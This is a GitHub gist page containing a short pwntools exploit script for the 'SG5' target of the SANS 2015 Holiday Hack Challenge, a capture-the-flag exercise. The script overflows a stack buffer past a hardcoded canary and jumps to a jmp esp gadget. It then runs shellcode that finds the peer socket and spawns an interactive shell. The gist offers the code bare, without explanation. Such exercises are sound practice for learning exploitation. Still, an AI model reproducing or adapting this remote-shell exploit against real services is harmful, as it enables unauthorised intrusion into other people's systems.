Skip to content

Instantly share code, notes, and snippets.

@fragmede

fragmede/get-shell.py

Last active January 14, 2016 05:48
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save fragmede/b86e38ffa5c9fa342f76 to your computer and use it in GitHub Desktop.
Save fragmede/b86e38ffa5c9fa342f76 to your computer and use it in GitHub Desktop.
Download ZIP
exploit for SG5 for SANS 2015 Holiday Hack Challenge
Raw
get-shell.py
from pwn import *
canary = p32(0xe4ffffe4)
jmpesp = p32(0x0804936b)
command = 'whoami; ls; pwd;'
r = remote('localhost', 4242)
r.recv()
r.sendline('X')
r.recvuntil('protected!\n')
r.recv()
payload = ''
payload += 'A' * cyclic_find('bbaa')
payload += canary
payload += 'B' * cyclic_find('baaa')
payload += jmpesp
payload += asm(shellcraft.alarm(0))
payload += asm(shellcraft.findpeersh())
log.info('sending shellcode')
r.sendline(payload)
r.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment